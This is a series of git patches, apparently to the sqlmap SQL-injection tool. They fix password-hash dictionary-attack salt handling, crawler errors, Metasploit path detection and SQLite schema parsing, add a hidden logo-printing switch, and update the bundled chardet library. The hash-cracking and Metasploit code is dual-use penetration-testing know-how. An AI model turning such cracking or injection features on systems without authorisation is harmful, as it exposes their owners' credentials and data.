c4a3739c9..3965efd0e 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -709,13 +709,13 @@ def dictionaryAttack(attack_dict): item = [(user, hash_), {}] elif hash_regex in (HASH.ORACLE_OLD, HASH.POSTGRES): item = [(user, hash_), {'username': user}] - elif hash_regex in (HASH.ORACLE): + elif hash_regex in (HASH.ORACLE,): item = [(user, hash_), {'salt': hash_[-20:]}] elif hash_regex in (HASH.MSSQL, HASH.MSSQL_OLD, HASH.MSSQL_NEW): item = [(user, hash_), {'salt': hash_[6:14]}] - elif hash_regex in (HASH.CRYPT_GENERIC): + elif hash_regex in (HASH.CRYPT_GENERIC,): item = [(user, hash_), {'salt': hash_[0:2]}] - elif hash_regex in (HASH.WORDPRESS): + elif hash_regex in (HASH.WORDPRESS,): item = [(user, hash_), {'salt': hash_[4:12], 'count': 1 << ITOA64.index(hash_[3]), 'prefix': hash_[:12]}] if item and hash_ not in keys: From b98f84a610473365cc7f019701fb551ad0ca3e53 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 5 Oct 2015 16:26:12 +0200 Subject: [PATCH 63/92] Fixes #1443 --- lib/utils/hash.py | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/lib/utils/hash.py b/lib/utils/hash.py index 3965efd0e..7ab48c26f 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -716,7 +716,11 @@ def dictionaryAttack(attack_dict): elif hash_regex in (HASH.CRYPT_GENERIC,): item = [(user, hash_), {'salt': hash_[0:2]}] elif hash_regex in (HASH.WORDPRESS,): - item = [(user, hash_), {'salt': hash_[4:12], 'count': 1 << ITOA64.index(hash_[3]), 'prefix': hash_[:12]}] + if ITOA64.index(hash_[3]) < 32: + item = [(user, hash_), {'salt': hash_[4:12], 'count': 1 << ITOA64.index(hash_[3]), 'prefix': hash_[:12]}] + else: + warnMsg = "invalid hash '%s'" % hash_ + logger.warn(warnMsg) if item and hash_ not in keys: resumed = hashDBRetrieve(hash_) From 95ce5a4a09a3294d9673bfac4a38befc7522b1d4 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 5 Oct 2015 16:33:10 +0200 Subject: [PATCH 64/92] Fixes #1444 --- lib/utils/crawler.py | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/lib/utils/crawler.py b/lib/utils/crawler.py index be47608e1..b76fd3df9 100644 --- a/lib/utils/crawler.py +++ b/lib/utils/crawler.py @@ -22,6 +22,7 @@ from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapSyntaxException from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS from lib.core.threads import getCurrentThreadData from lib.core.threads import runThreads @@ -58,12 +59,15 @@ def crawl(target): try: if current: content = Request.getPage(url=current, crawling=True, raise404=False)[0] - except SqlmapConnectionException, e: - errMsg = "connection exception detected (%s). skipping " % e + except SqlmapConnectionException, ex: + errMsg = "connection exception detected (%s). skipping " % ex errMsg += "URL '%s'" % current logger.critical(errMsg) - except httplib.InvalidURL, e: - errMsg = "invalid URL detected (%s). skipping " % e + except SqlmapSyntaxException: + errMsg = "invalid URL detected. skipping '%s'" % current + logger.critical(errMsg) + except httplib.InvalidURL, ex: + errMsg = "invalid URL detected (%s). skipping " % ex errMsg += "URL '%s'" % current logger.critical(errMsg) From 551b7e4b4566475b4c2a539746803b10b796596a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 6 Oct 2015 13:23:01 +0200 Subject: [PATCH 65/92] Patch for an Issue #1450 --- lib/core/settings.py | 49 ++++++++++++++++++++++++++++++++++++++++++++ lib/parse/cmdline.py | 9 ++++++++ 2 files changed, 58 insertions(+) diff --git a/lib/core/settings.py b/lib/core/settings.py index c18eb57dd..3256c0fa1 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -680,3 +680,52 @@ th{ font-size:10px; } """ + +NNC5ED_LOGO = """ +MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM +MMWWMMMWWMMMWWMMMMWWMMMMWWMMMWWMMMMMWMMMWWWMMMMMMMWWMMMWWMWMWWWWMMMWWWMMMWMWWWMMMMMWWMMMMM +MMNNNMMNNMMWXNNMMMWNWMMWNWMMNNNWMMMNNWMWNNNMMMMMMWNNWMMNNWNWWWWWMNNWWNNNWNNWWWNWMMNNNNMMMM +MMWWWNWNXMMNNWNNMMMNNMWNWMMWXWNXWMMNXWMNNWNNMMMMMWNWNNWXNWNWWNWWNNWMMMWWWNNWWNNWMWXWNXWMMM +MMNNMWNNNMNNNNNXWMMMNNNNMMWNNNNXNMMNNWWNNNNXWMMMMWXWMNNNNWNWMMMMWNWMWWNNWNNWWWWMWNNNNXNMMM +MMNNMMWNNWNWMMMNNWMMWWNMMMNNMMMWNNWNWWNNMMMNNWMMMWNWMMNNWWNWWNNWMWNWWNNWMWWMMMWWNNWMMWNNMM +MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM +MMMMMMMMMMMMMMMMMMMMMNXXXXXXXXXXXXXXNMMMMMMMMMMMMMMMMMMWXXXXXXXXXXXXXXNMMMMMMMMMMMMMMMMMMM +MMMMMMMMMMMMMMMMMMMM00:,'',,;'...';cld0XXWMMMMMMMMWXXKxlc;'...';,,'',:O0MMMMMMMMMMMMMMMMMM +MMMMMMMMMMMMMMMMMMMNK,       .,;:.     .:kKXXXXXXKkc.     .:;,.       .XXMMMMMMMMMMMMMMMMM +MMMMMMMMMMMMMMMMMMM0W            ;d.      'c;,,;:,      .d;            N0MMMMMMMMMMMMMMMMM +MMMMMMMMMMMMMMMMMMM0W              K;                  'K.         .odoX0MMMMMMMMMMMMMMMMM +MMMMMMMMMMMMMMMMMMM0W            :l.          '         .cc        OOX00MMMMMMMMMMMMMMMMMM +MMMMMMMMMMMMMMMMMMMKX.         ':             .;           ;,       :lcN0MMMMMMMMMMMMMMMMM +MMMMMMMMMMMMMMMMMMMM0l        ;.               l             ;        ;0WMMMMMMMMMMMMMMMMM +MMMMMMMMMMMMMMMMMMMM0X       .                 l              .       O0MMMMMMMMMMMMMMMMMM +MMMMMMMMMMMWXXXXXMMMW0d                        :                     cKNMMMXXXXXXWMMMMMMMM +MMMMMMMMMMXKl. .dKNMMNKo      .'::             '          ;:,.      lKXMMN0d.  .:KKMMMMMMM +MMMMMMMMMM0:     dxkO0OKK;  ,KMMMN    ,ko.     .   lO:    0MMMXc  ,0X00OOxO      ;KXMMMMMM +MMMMMMMMMKX.             :  kMMMMM.  oMMMWo      cWMMMO   WMMMMK  c               :0WMMMMM +MMMMMMMMM0K             .'   kMMMMx .MMMMMM0    kMMMMMM: lMMMM0.  .'              ;0WMMMMM +MMMMMMMMMXK:   ;0XXXXXXKN.    'kWMMl:MMMMMMMd  cMMMMMMMo;MMMO,     XKXXXXXXXOo,.,o0XMMMMMM +MMMMMMMMMMNXX0XXNMMMMMMM0O       ,ldlkO0OOxl.   cxOO0OOodl,       k0WMMMMMMMMXXXXXMMMMMMMM +MMMMMMMMMMMMMMMMMMMMMMMMWO0                                      k0KWMMMMMMMMMMMMMMMMMMMMM +MMMMMMMMMMMMNKOooxKXXXXkoc,,.                ..                .;.,ldOXXXNMNXXXWMMMMMMMMMM +MMMMMMMMMMMWOd     :;.      .c.            oNMMWx            .o,       .;ldd:;ckKNMMMMMMMM +MMMMMMMMMMMW0:           .:d0XXOl'        'WKMMKN;        'lkXXXOo;.            l0WMMMMMMM +MMMMMMMMMMMMOx       .:d0XXWMMXXk0OO:.       0X.      .,kO0OKXMMMNXXOo;         .KXMMMMMMM +MMMMMMMMMMMM0o      ;XXNMMMMWK00kNOk0Xkx,          'dxKKkONkO0KNMMMMMNKN.       O0MMMMMMMM +MMMMMMMMMMMMXKd.  .lKXMMMMMMO0Kk0xKxXkKXX0Oo,..,lkOXX000xKxKkKO0WMMMMMM00.     d0MMMMMMMMM +MMMMMMMMMMMMMMXXXXXXWMMMMMM0W000WO00XK0NKk;;cll:,,xKN0N0000X0OKX0MMMMMMMXXxlloOKWMMMMMMMMM +MMMMMMMMMMMMMMMMMMMMMMMMMMM0WX0NK0KXKX00l;NdlollXN.x0KXKXK0KX0WX0MMMMMMMMMMNXNMMMMMMMMMMMM +MMMMMMMMMMMMMMMMMMMMMMMMMMMWXXNMNXXNMN0d ;,.ccc;.c'.k0MMWKXXMWXXNMMMMMMMMMMMMMMMMMMMMMMMMM +MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM0N  kKKKOOKKK: 'KXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM +MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM0N  WMMlNKOMMx 'KXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM +MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM0N  WMMdX0OMMx 'KXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM +MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM0N  k00000000: 'KXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM +MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMN0d::::::::::::k0MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM +MMMMMMMW00OOXMMMMMMMMMMMMMMMMMMMMMMMMMMXXXXXXXXXXXXXNMMMMMMMMMMN00O0WMMMMMMMMMMMMMMMMMMMMM +MMMMMMd;KMMK,:XMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMKlKMMMMMMMMMMXclNMWd,dMMMMMMMMMMMMMMMMMMMM +MMMMMO';NMMMxo0No:lccOM0oxdc:lNWd::;:xWNdk00loNl,';:NOc::;:kM:'oMMMXodW0c:l:oXMdokl:ckMMMM +MMMMMk''KMMNdxKo';WN''kk'dXK,'0o',dc''kl'0MMKkXK''KNMklldc',W;':MMM0xxX''xMx',W:,0Xd';MMMM +MMMMMWl,WMMW';XO,,K0',0k'dMN''K0cckx',Kk'0MMo,K0''kcd''ck,',WK;oMMMk'dWc'oXo':W:'XMx':MMMM +MMMMMMMXOO0KKWMMNOxxONMXOXMWkxNMKkxxONMMX0KK0NMM0xxOW0xxO0kOWMMKOO00NMMMKkxkKMMOOWMXxOMMMM +MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM + +""" \ No newline at end of file diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 03bb1ac80..5c0dc16d7 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -17,6 +17,7 @@ from optparse import SUPPRESS_HELP from lib.core.common import checkDeprecatedOptions from lib.core.common import checkSystemEncoding +from lib.core.common import dataToStdout from lib.core.common import expandMnemonics from lib.core.common import getUnicode from lib.core.data import cmdLineOptions @@ -30,6 +31,7 @@ from lib.core.settings import BASIC_HELP_ITEMS from lib.core.settings import DUMMY_URL from lib.core.settings import IS_WIN from lib.core.settings import MAX_HELP_OPTION_LENGTH +from lib.core.settings import NNC5ED_LOGO from lib.core.settings import VERSION_STRING from lib.core.shell import autoCompletion from lib.core.shell import clearHistory @@ -780,6 +782,9 @@ def cmdLineParser(argv=None): parser.add_option("--run-case", dest="runCase", help=SUPPRESS_HELP) + parser.add_option("--nnc5ed", dest="nnc5ed", action="store_true", + help=SUPPRESS_HELP) # temporary hidden switch :) + parser.add_option_group(target) parser.add_option_group(request) parser.add_option_group(optimization) @@ -925,6 +930,10 @@ def cmdLineParser(argv=None): if argv[i] == "-z": expandMnemonics(argv[i + 1], parser, args) + if args.nnc5ed: + dataToStdout(NNC5ED_LOGO) + raise SystemExit + if args.dummy: args.url = args.url or DUMMY_URL From 78bbf5d63cc2aa738248fdde79e6a593328cf6f5 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 6 Oct 2015 14:17:35 +0200 Subject: [PATCH 66/92] Fixes #1451 --- lib/controller/controller.py | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/controller/controller.py b/lib/controller/controller.py index e557c6ac1..a6d689ac0 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -421,6 +421,7 @@ def start(): skip |= (place == PLACE.USER_AGENT and intersect(USER_AGENT_ALIASES, conf.skip, True) not in ([], None)) skip |= (place == PLACE.REFERER and intersect(REFERER_ALIASES, conf.skip, True) not in ([], None)) skip |= (place == PLACE.COOKIE and intersect(PLACE.COOKIE, conf.skip, True) not in ([], None)) + skip |= (place == PLACE.HOST and intersect(PLACE.HOST, conf.skip, True) not in ([], None)) skip &= not (place == PLACE.USER_AGENT and intersect(USER_AGENT_ALIASES, conf.testParameter, True)) skip &= not (place == PLACE.REFERER and intersect(REFERER_ALIASES, conf.testParameter, True)) From 657d71119b04326b21a494ee038dc29ce3abfda9 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 7 Oct 2015 09:22:11 +0200 Subject: [PATCH 67/92] Fixes #1453 --- lib/utils/google.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/utils/google.py b/lib/utils/google.py index 0fec576e6..e32278972 100644 --- a/lib/utils/google.py +++ b/lib/utils/google.py @@ -97,9 +97,9 @@ class Google(object): except urllib2.HTTPError, e: try: page = e.read() - except socket.timeout: - warnMsg = "connection timed out while trying " - warnMsg += "to get error page information (%d)" % e.code + except Exception, ex: + warnMsg = "problem occurred while trying to get " + warnMsg += "an error page information (%s)" % getSafeExString(ex) logger.critical(warnMsg) return None except (urllib2.URLError, httplib.error, socket.error, socket.timeout, socks.ProxyError): From eb7c18d1f8e21a27ffef5ef8e0e8af46cab23c01 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 7 Oct 2015 09:25:14 +0200 Subject: [PATCH 68/92] Fixes #1452 --- lib/request/connect.py | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/lib/request/connect.py b/lib/request/connect.py index b0d645264..b5f222882 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -185,7 +185,11 @@ class Connect(object): kb.pageCompress = False else: while True: - _ = conn.read(MAX_CONNECTION_CHUNK_SIZE) + if not conn: + break + else: + _ = conn.read(MAX_CONNECTION_CHUNK_SIZE) + if len(_) == MAX_CONNECTION_CHUNK_SIZE: warnMsg = "large response detected. This could take a while" singleTimeWarnMessage(warnMsg) From fd686fb691106ec9cfb30524720ac41a0da6c8f7 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 7 Oct 2015 09:43:25 +0200 Subject: [PATCH 69/92] Patch related to the #1455 --- lib/core/option.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/lib/core/option.py b/lib/core/option.py index f51e5210c..6703ad491 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -779,6 +779,7 @@ def _setMetasploit(): kb.oldMsf = True else: msfEnvPathExists = False + conf.msfPath = path break @@ -809,7 +810,7 @@ def _setMetasploit(): for envPath in envPaths: envPath = envPath.replace(";", "") - if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("", "msfcli", "msfconsole")): + if any(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfcli", "msfconsole")): msfEnvPathExists = True if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfvenom",)): kb.oldMsf = False From 8bf236ce11f20a73e77a9c592b7319e0f4cc9d09 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 7 Oct 2015 10:01:48 +0200 Subject: [PATCH 70/92] Minor patch for SQLite parsing of schemas --- lib/core/common.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/core/common.py b/lib/core/common.py index ba923fd31..1a43aaf1f 100755 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -2698,7 +2698,7 @@ def parseSqliteTableSchema(value): table = {} columns = {} - for match in re.finditer(r"(\w+)\s+(INT|INTEGER|TINYINT|SMALLINT|MEDIUMINT|BIGINT|UNSIGNED BIG INT|INT2|INT8|INTEGER|CHARACTER|VARCHAR|VARYING CHARACTER|NCHAR|NATIVE CHARACTER|NVARCHAR|TEXT|CLOB|TEXT|BLOB|NONE|REAL|DOUBLE|DOUBLE PRECISION|FLOAT|REAL|NUMERIC|DECIMAL|BOOLEAN|DATE|DATETIME|NUMERIC)\b", value, re.I): + for match in re.finditer(r"(\w+)[\"'`]?\s+(INT|INTEGER|TINYINT|SMALLINT|MEDIUMINT|BIGINT|UNSIGNED BIG INT|INT2|INT8|INTEGER|CHARACTER|VARCHAR|VARYING CHARACTER|NCHAR|NATIVE CHARACTER|NVARCHAR|TEXT|CLOB|TEXT|BLOB|NONE|REAL|DOUBLE|DOUBLE PRECISION|FLOAT|REAL|NUMERIC|DECIMAL|BOOLEAN|DATE|DATETIME|NUMERIC)\b", value, re.I): columns[match.group(1)] = match.group(2) table[conf.tbl] = columns From d424d4cdc711c97baa97571c2b6b689a3ef25eba Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 9 Oct 2015 11:54:28 +0200 Subject: [PATCH 71/92] Fixes #1457 --- lib/core/agent.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/lib/core/agent.py b/lib/core/agent.py index 556f379a9..f44c369cb 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -501,7 +501,8 @@ class Agent(object): elif fieldsMinMaxstr: fieldsToCastStr = fieldsMinMaxstr.groups()[0] elif fieldsExists: - fieldsToCastStr = fieldsSelect.groups()[0] + if fieldsSelect: + fieldsToCastStr = fieldsSelect.groups()[0] elif fieldsSelectTop: fieldsToCastStr = fieldsSelectTop.groups()[0] elif fieldsSelectRownum: From 439d0037539fca01b3b2f9ffdb4808bc5871c342 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 9 Oct 2015 13:35:48 +0200 Subject: [PATCH 72/92] Adding new version of chardet --- thirdparty/chardet/__init__.py | 14 +- thirdparty/chardet/big5freq.py | 20 +- thirdparty/chardet/big5prober.py | 17 +- thirdparty/chardet/chardetect.py | 80 +++ thirdparty/chardet/chardistribution.py | 153 +++-- thirdparty/chardet/charsetgroupprober.py | 34 +- thirdparty/chardet/charsetprober.py | 16 +- thirdparty/chardet/codingstatemachine.py | 15 +- thirdparty/chardet/compat.py | 34 + thirdparty/chardet/constants.py | 8 - thirdparty/chardet/cp949prober.py | 44 ++ thirdparty/chardet/escprober.py | 37 +- thirdparty/chardet/escsm.py | 336 +++++----- thirdparty/chardet/eucjpprober.py | 41 +- thirdparty/chardet/euckrfreq.py | 2 + thirdparty/chardet/euckrprober.py | 13 +- thirdparty/chardet/euctwfreq.py | 16 +- thirdparty/chardet/euctwprober.py | 8 +- thirdparty/chardet/gb2312freq.py | 9 +- thirdparty/chardet/gb2312prober.py | 8 +- thirdparty/chardet/hebrewprober.py | 178 ++--- thirdparty/chardet/jisfreq.py | 16 +- thirdparty/chardet/jpcntx.py | 89 ++- thirdparty/chardet/langbulgarianmodel.py | 29 +- thirdparty/chardet/langcyrillicmodel.py | 50 +- thirdparty/chardet/langgreekmodel.py | 26 +- thirdparty/chardet/langhebrewmodel.py | 20 +- thirdparty/chardet/langhungarianmodel.py | 26 +- thirdparty/chardet/langthaimodel.py | 22 +- thirdparty/chardet/latin1prober.py | 141 ++-- thirdparty/chardet/mbcharsetprober.py | 34 +- thirdparty/chardet/mbcsgroupprober.py | 28 +- thirdparty/chardet/mbcssm.py | 814 ++++++++++++----------- thirdparty/chardet/sbcharsetprober.py | 50 +- thirdparty/chardet/sbcsgroupprober.py | 39 +- thirdparty/chardet/sjisprober.py | 46 +- thirdparty/chardet/test.py | 20 - thirdparty/chardet/universaldetector.py | 92 +-- thirdparty/chardet/utf8prober.py | 22 +- 39 files changed, 1499 insertions(+), 1148 deletions(-) create mode 100644 thirdparty/chardet/chardetect.py create mode 100644 thirdparty/chardet/compat.py create mode 100644 thirdparty/chardet/cp949prober.py delete mode 100644 thirdparty/chardet/test.py diff --git a/thirdparty/chardet/__init__.py b/thirdparty/chardet/__init__.py index 953b39942..82c2a48d2 100644 --- a/thirdparty/chardet/__init__.py +++ b/thirdparty/chardet/__init__.py @@ -3,22 +3,28 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -__version__ = "2.0.1" +__version__ = "2.3.0" +from sys import version_info + def detect(aBuf): - import universaldetector + if ((version_info < (3, 0) and isinstance(aBuf, unicode)) or + (version_info >= (3, 0) and not isinstance(aBuf, bytes))): + raise ValueError('Expected a bytes object, not a unicode object') + + from . import universaldetector u = universaldetector.UniversalDetector() u.reset() u.feed(aBuf) diff --git a/thirdparty/chardet/big5freq.py b/thirdparty/chardet/big5freq.py index c1b0f3cec..65bffc04b 100644 --- a/thirdparty/chardet/big5freq.py +++ b/thirdparty/chardet/big5freq.py @@ -1,11 +1,11 @@ ######################## BEGIN LICENSE BLOCK ######################## # The Original Code is Mozilla Communicator client code. -# +# # The Initial Developer of the Original Code is # Netscape Communications Corporation. # Portions created by the Initial Developer are Copyright (C) 1998 # the Initial Developer. All Rights Reserved. -# +# # Contributor(s): # Mark Pilgrim - port to Python # @@ -13,12 +13,12 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA @@ -26,18 +26,18 @@ ######################### END LICENSE BLOCK ######################### # Big5 frequency table -# by Taiwan's Mandarin Promotion Council +# by Taiwan's Mandarin Promotion Council # -# +# # 128 --> 0.42261 # 256 --> 0.57851 # 512 --> 0.74851 # 1024 --> 0.89384 # 2048 --> 0.97583 -# +# # Ideal Distribution Ratio = 0.74851/(1-0.74851) =2.98 # Random Distribution Ration = 512/(5401-512)=0.105 -# +# # Typical Distribution Ratio about 25% of Ideal one, still much higher than RDR BIG5_TYPICAL_DISTRIBUTION_RATIO = 0.75 @@ -45,7 +45,7 @@ BIG5_TYPICAL_DISTRIBUTION_RATIO = 0.75 #Char to FreqOrder table BIG5_TABLE_SIZE = 5376 -Big5CharToFreqOrder = ( \ +Big5CharToFreqOrder = ( 1,1801,1506, 255,1431, 198, 9, 82, 6,5008, 177, 202,3681,1256,2821, 110, # 16 3814, 33,3274, 261, 76, 44,2114, 16,2946,2187,1176, 659,3971, 26,3451,2653, # 32 1198,3972,3350,4202, 410,2215, 302, 590, 361,1964, 8, 204, 58,4510,5009,1932, # 48 @@ -921,3 +921,5 @@ Big5CharToFreqOrder = ( \ 13936,13937,13938,13939,13940,13941,13942,13943,13944,13945,13946,13947,13948,13949,13950,13951, #13952 13952,13953,13954,13955,13956,13957,13958,13959,13960,13961,13962,13963,13964,13965,13966,13967, #13968 13968,13969,13970,13971,13972) #13973 + +# flake8: noqa diff --git a/thirdparty/chardet/big5prober.py b/thirdparty/chardet/big5prober.py index e6b52aadb..becce81e5 100644 --- a/thirdparty/chardet/big5prober.py +++ b/thirdparty/chardet/big5prober.py @@ -1,11 +1,11 @@ ######################## BEGIN LICENSE BLOCK ######################## # The Original Code is Mozilla Communicator client code. -# +# # The Initial Developer of the Original Code is # Netscape Communications Corporation. # Portions created by the Initial Developer are Copyright (C) 1998 # the Initial Developer. All Rights Reserved. -# +# # Contributor(s): # Mark Pilgrim - port to Python # @@ -13,22 +13,23 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -from mbcharsetprober import MultiByteCharSetProber -from codingstatemachine import CodingStateMachine -from chardistribution import Big5DistributionAnalysis -from mbcssm import Big5SMModel +from .mbcharsetprober import MultiByteCharSetProber +from .codingstatemachine import CodingStateMachine +from .chardistribution import Big5DistributionAnalysis +from .mbcssm import Big5SMModel + class Big5Prober(MultiByteCharSetProber): def __init__(self): diff --git a/thirdparty/chardet/chardetect.py b/thirdparty/chardet/chardetect.py new file mode 100644 index 000000000..ffe892f25 --- /dev/null +++ b/thirdparty/chardet/chardetect.py @@ -0,0 +1,80 @@ +#!/usr/bin/env python +""" +Script which takes one or more file paths and reports on their detected +encodings + +Example:: + + % chardetect somefile someotherfile + somefile: windows-1252 with confidence 0.5 + someotherfile: ascii with confidence 1.0 + +If no paths are provided, it takes its input from stdin. + +""" + +from __future__ import absolute_import, print_function, unicode_literals + +import argparse +import sys +from io import open + +from chardet import __version__ +from chardet.universaldetector import UniversalDetector + + +def description_of(lines, name='stdin'): + """ + Return a string describing the probable encoding of a file or + list of strings. + + :param lines: The lines to get the encoding of. + :type lines: Iterable of bytes + :param name: Name of file or collection of lines + :type name: str + """ + u = UniversalDetector() + for line in lines: + u.feed(line) + u.close() + result = u.result + if result['encoding']: + return '{0}: {1} with confidence {2}'.format(name, result['encoding'], + result['confidence']) + else: + return '{0}: no result'.format(name) + + +def main(argv=None): + ''' + Handles command line arguments and gets things started. + + :param argv: List of arguments, as if specified on the command-line. + If None, ``sys.argv[1:]`` is used instead. + :type argv: list of str + ''' + # Get command line arguments + parser = argparse.ArgumentParser( + description="Takes one or more file paths and reports their detected \ + encodings", + formatter_class=argparse.ArgumentDefaultsHelpFormatter, + conflict_handler='resolve') + parser.add_argument('input', + help='File whose encoding we would like to determine.', + type=argparse.FileType('rb'), nargs='*', + default=[sys.stdin]) + parser.add_argument('--version', action='version', + version='%(prog)s {0}'.format(__version__)) + args = parser.parse_args(argv) + + for f in args.input: + if f.isatty(): + print("You are running chardetect interactively. Press " + + "CTRL-D twice at the start of a blank line to signal the " + + "end of your input. If you want help, run chardetect " + + "--help\n", file=sys.stderr) + print(description_of(f, f.name)) + + +if __name__ == '__main__': + main() diff --git a/thirdparty/chardet/chardistribution.py b/thirdparty/chardet/chardistribution.py index 1f95fc848..4e64a00be 100644 --- a/thirdparty/chardet/chardistribution.py +++ b/thirdparty/chardet/chardistribution.py @@ -1,11 +1,11 @@ ######################## BEGIN LICENSE BLOCK ######################## # The Original Code is Mozilla Communicator client code. -# +# # The Initial Developer of the Original Code is # Netscape Communications Corporation. # Portions created by the Initial Developer are Copyright (C) 1998 # the Initial Developer. All Rights Reserved. -# +# # Contributor(s): # Mark Pilgrim - port to Python # @@ -13,47 +13,63 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants -from euctwfreq import EUCTWCharToFreqOrder, EUCTW_TABLE_SIZE, EUCTW_TYPICAL_DISTRIBUTION_RATIO -from euckrfreq import EUCKRCharToFreqOrder, EUCKR_TABLE_SIZE, EUCKR_TYPICAL_DISTRIBUTION_RATIO -from gb2312freq import GB2312CharToFreqOrder, GB2312_TABLE_SIZE, GB2312_TYPICAL_DISTRIBUTION_RATIO -from big5freq import Big5CharToFreqOrder, BIG5_TABLE_SIZE, BIG5_TYPICAL_DISTRIBUTION_RATIO -from jisfreq import JISCharToFreqOrder, JIS_TABLE_SIZE, JIS_TYPICAL_DISTRIBUTION_RATIO +from .euctwfreq import (EUCTWCharToFreqOrder, EUCTW_TABLE_SIZE, + EUCTW_TYPICAL_DISTRIBUTION_RATIO) +from .euckrfreq import (EUCKRCharToFreqOrder, EUCKR_TABLE_SIZE, + EUCKR_TYPICAL_DISTRIBUTION_RATIO) +from .gb2312freq import (GB2312CharToFreqOrder, GB2312_TABLE_SIZE, + GB2312_TYPICAL_DISTRIBUTION_RATIO) +from .big5freq import (Big5CharToFreqOrder, BIG5_TABLE_SIZE, + BIG5_TYPICAL_DISTRIBUTION_RATIO) +from .jisfreq import (JISCharToFreqOrder, JIS_TABLE_SIZE, + JIS_TYPICAL_DISTRIBUTION_RATIO) +from .compat import wrap_ord ENOUGH_DATA_THRESHOLD = 1024 SURE_YES = 0.99 SURE_NO = 0.01 